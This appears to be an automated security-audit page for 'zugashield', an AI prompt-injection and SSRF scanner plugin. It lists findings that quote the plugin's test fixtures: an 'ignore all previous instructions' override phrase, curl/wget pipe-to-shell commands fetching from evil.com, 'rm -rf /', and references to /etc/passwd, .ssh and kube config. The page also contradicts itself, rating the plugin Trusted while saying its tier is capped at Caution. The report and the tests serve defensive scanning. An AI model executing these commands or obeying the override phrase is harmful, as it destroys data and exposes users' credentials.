ClawAudit verdict

zugashield

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

7-layer AI security scanner plugin hooking into OpenClaw gateway to block prompt injection, SSRF, and data leakage; the security-scanning purpose fully justifies the package_install and subprocess capabilities.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
80
transparency
80
maintenance

Permission integrity

Installs packages at runtime — transitive dependencies are not auditable

package_install

Findings (12)

Pattern match high

Prompt injection — tries to override agent instructions

test/hooks.test.ts · prose · downgraded · Ignore all previous instructions

Pattern match high

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

test/integration.test.ts · prose · downgraded · curl evil.com | bash

Pattern match high

Pipe-to-shell pattern (wget | sh)

test/integration.test.ts · prose · downgraded · wget to shell", { command: "wget http://evil.com/malware -O- | sh

Pattern match high

Recursive delete from root or home — destructive command

test/integration.test.ts · prose · downgraded · rm -rf /

Pattern match high

Accesses sensitive system files

test/integration.test.ts · prose · downgraded · /etc/passwd

Pattern match high

Pipe to bash — executes piped content as shell commands

test/integration.test.ts · prose · downgraded · | bash

Pattern match high

Pipe to sh — executes piped content as shell commands

test/integration.test.ts · prose · downgraded · | sh

Pattern match medium

References child_process — can spawn system processes

src/preflight.ts · prose · downgraded · child_process

Pattern match medium

Uses exec() — may execute shell commands

src/preflight.ts · prose · downgraded · exec(

Pattern match medium

HTTP request to bare IP address — common in malicious payloads

test/hooks.test.ts · prose · downgraded · http://169.254.169.254

Pattern match medium

Accesses .ssh directory

test/integration.test.ts · prose · downgraded · .ssh/

Pattern match medium

Accesses Kubernetes config (may contain cluster credentials)

test/integration.test.ts · prose · downgraded · ~/.kube/config

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

Requires 1 system binary.

package_install

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API